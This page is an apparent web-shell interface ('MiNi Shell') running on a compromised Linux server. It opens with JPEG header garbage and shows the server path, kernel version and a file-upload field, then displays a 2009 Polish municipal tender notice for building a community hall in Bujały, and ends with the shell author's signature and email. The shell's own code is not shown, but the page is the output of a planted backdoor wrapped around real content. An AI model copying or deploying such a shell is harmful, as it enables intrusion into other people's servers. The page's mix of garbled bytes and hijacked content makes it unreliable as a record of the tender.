JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091002/167983-N-2009.html

<p class="kh_header"><b>Sadkowice: Budowa Świetlicy Środowiskowej w miejscowości Bujały</b><br>
<b>Numer ogłoszenia: 167983 - 2009; data zamieszczenia: 02.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sadkowice , Sadkowice 129A, 96-206 Sadkowice, woj. łódzkie, tel. 046 8156191, faks 046 8156191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminasadkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Świetlicy Środowiskowej w miejscowości Bujały.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa Świetlicy Środowiskowej w miejscowości Bujały. 
W zakres zadania wchodzi budowa budynku Świetlicy Środowiskowej w miejscowości Bujały, wolnostojącego, parterowego, niepodpiwniczonego, z poddaszem nieużytkowym-strychem,  o powierzchni zabudowy 257,73 m2, powierzchni użytkowej 216,61 m2, kubaturze 1.417,51 m3 , wraz ze zjazdem  z drogi publicznej zgodnie z dokumentacją architektoniczno-budowlaną zatwierdzoną Decyzją Nr 227/2008 z dnia 25.06.2008 r.  Starosty Rawskiego - pozwoleniem na budowę , oraz roboty zgłoszone do  Starosty Rawskiego to jest :

- utwardzenie placu 
- budowa przyłącza elektroenergetycznego kablowego zasilającego budynek Świetlicy Środowiskowej w zakresie budowy  wewnętrznej linii zasilania (opłatę przyłączeniową do Zakładu Energetycznego zapłaci Gmina Sadkowice, przyłącze kablowe wykona Zakład Energetyczny porozumiewając się bezpośrednio z Gminą Sadkowice)
-  utwardzenie pobocza drogi w kategorii dróg gminnych 
- ogrodzenie działki nr 22/2 
- budowa oczyszczalni ścieków 
Szczegółowy zakres określa dokumentacja projektowa.
Zadanie zostanie zrealizowane w gminie Sadkowice, województwie łódzkim, powiecie rawskim, obręb 2, na działkach nr  22/2  i 154..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.11.12.91-4, 45.21.21.71-5, 45.21.13.50-7, 45.11.00.00-1, 45.30.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Informacja na temat wadium: 
Warunkiem przystąpienia do przetargu jest wniesienie wadium w wysokości 
12 000,00 PLN (słownie złotych: dwanaście tysięcy złotych 00/100 PLN).                        Wadium winno być wniesione w formie określonej w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
Dowód wniesienia wadium należy dołączyć do oferty. Oryginał należy załączyć luzem, 
a kopię trwale spiąć z ofertą.
W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na konto: 
 nr  16928811251850078120000040  z takim wyprzedzeniem, aby środki znalazły się na koncie Zamawiającego przed otwarciem ofert.
Zwrot, zatrzymanie lub ponowne wniesienie wadium następuje na warunkach określonych                  w art. 46 ustawy Prawo zamówień publicznych.
Gwarancja bankowa lub ubezpieczeniowa musi zawierać w swojej treści zapis o realizacji gwarancji na rzecz Zamawiającego zgodnie z podstawami utraty wadium zawartymi, w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków: 
O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający następujące
warunki: 
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Warunki  szczegółowo sprecyzowano w Dziale VI  SIWZ.

2.   Ocena spełnienia warunków postępowania dokonana zostanie zgodnie z formułą
spełnia - nie spełnia w oparciu o informacje zawarte w załączonych do oferty
oświadczeniach i dokumentach oraz informacji zawartych w treści tych dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu: 
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy złożą następujące dokumenty i oświadczenia:

1) Formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1
2) Sporządzone przez Wykonawcę kosztorysy ofertowe opracowane na podstawie przedmiarów  stanowiących załączniki  nr 11a, 11b, 11c, 11d, 11e, 11f, 11g  
3)  Zaparafowany na dowód akceptacji projekt umowy na każdej ze stron - zał. nr 5.
4)  Formularz cenowy - załącznik nr 2

A.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:
 A.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.  
 A.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających wniosek o dopuszczenie do udziału w postępowaniu oraz ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.  
A.3) Oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 
 i art.  24 Prawa zamówień publicznych z wykorzystaniem  wzoru  zał. nr 3 i nr 6.
A.4. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzające odpowiednio, że Wykonawca  nie zalega                        z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, 
lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 

B. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
B.1.  Wykaz wykonanych w okresie ostatnich pięciu lat robót budowlanych, a jeżeli okres
prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim
rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z
podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów
potwierdzających, że roboty te zostały wykonane należycie. 
Warunkiem przystąpienia do przetargu jest udokumentowanie, że w w/w okresie Wykonawca należycie wykonał co najmniej 2 roboty budowlane o podobnym charakterze o  kubaturze   minimalnej obiektu 1000 m 3 każda z nich.
Wzór wykazu - załącznik nr 4.
B.2  Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca, i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zakresu wykonywanych przez nich czynności            (wg wzoru podanego w załączniku nr  7)
B.3. Dokumenty potwierdzające odpowiednie uprawnienia kierownika budowy do kierowania robotami budowlanymi określonymi  przepisami  ustawy - Prawo budowlane,
to jest: kserokopie uprawnień kierownika budowy do kierowania robotami budowlanymi 
w specjalnościach: konstrukcyjno-budowlanej, instalacyjnej   w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych   i kanalizacyjnych , instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych  i elektroenergetycznych, 
wraz z aktualnymi zaświadczeniami o przynależności do  właściwej izby samorządu zawodowego;

C. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
C.1)  Zamiast dokumentów, o których mowa w pkt. A 1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu .

D. Dokumenty wymagane w przypadku składania oferty wspólnej: 
D.1 W przypadku kiedy ofertę składa kilka podmiotów, oferta tych wykonawców musi spełniać następujące  warunki:
1) Oferta winna być podpisana przez każdego z wykonawców występujących wspólnie  lub upoważnionego przedstawiciela, pełnomocnika, partnera wiodącego (lidera konsorcjum)
2) Upoważnienie do pełnienia funkcji przedstawiciela, pełnomocnika, partnera wiodącego (lidera konsorcjum) - wymaga podpisu prawnie upoważnionych przedstawicieli  każdego z wykonawców występujących wspólnie ,
3) Przedstawiciel, pełnomocnik, wiodący partner (lider konsorcjum)- winien być upoważniony do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia  
i zawarcia umowy w sprawie zamówienia publicznego.
Pełnomocnictwo (upoważnienie) winno w szczególności zawierać:
-   nazwę postępowania o zamówienie publiczne, którego dotyczy,
-   wskazywać wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia
wymienionych co najmniej z nazwy,
- zawierać informacje dotyczące ustanowionego Pełnomocnika oraz zakresu jego umocowania,
- dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli.
4) Podmioty występujące wspólnie ponoszą solidarną  odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.
5) W przypadku dokonania wyboru oferty wykonawcy występującego wspólnie przed przystąpieniem do zawarcia umowy o zamówienie publiczne Wykonawca wiodący przedłoży  umowę regulującą współpracę Wykonawców występujących wspólnie.
6) termin na jaki została zawarta umowa Wykonawców nie może być krótszy od terminu określonego na wykonanie zamówienia.
7) Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem, upoważnionym przedstawicielem, partnerem wiodącym (liderem konsorcjum), 
8) W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się                       udzielenie zamówienia, dokumenty wymienione w ust. A1, A2 i A.4 składa każdy                   z Wykonawców oddzielnie. Dokumenty o których mowa w części B mogą być przedstawione przez jednego Wykonawcę lub wspólnie.  
9) Podmiot wiodący zobowiązany jest do przedłożenia wszystkich dokumentów wymaganych i wymienionych w specyfikacji dokumentów. 
10) oświadczeni wg załączników  Nr 3 i Nr 6  podpisuje każdy z wykonawców występujących wspólnie  lub upoważniony przedstawiciel, pełnomocnik, partner wiodący (lider konsorcjum).
11)  Pozostałe dokumenty, nie wymienione niniejszym dziale podpisuje każdy z wykonawców występujących wspólnie  lub upoważniony przedstawiciel, pełnomocnik, partner wiodący (lider konsorcjum).
Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez  osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.gminasadkowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na pisemny wniosek Zamawiający przekazuje w terminie 5 dni specyfikację istotnych warunków zamówienia..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2009 godzina 11:00, miejsce: Urząd Gminy w Sadkowicach
Sadkowice 129 A
96-206 Sadkowice
Pokój nr 1 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com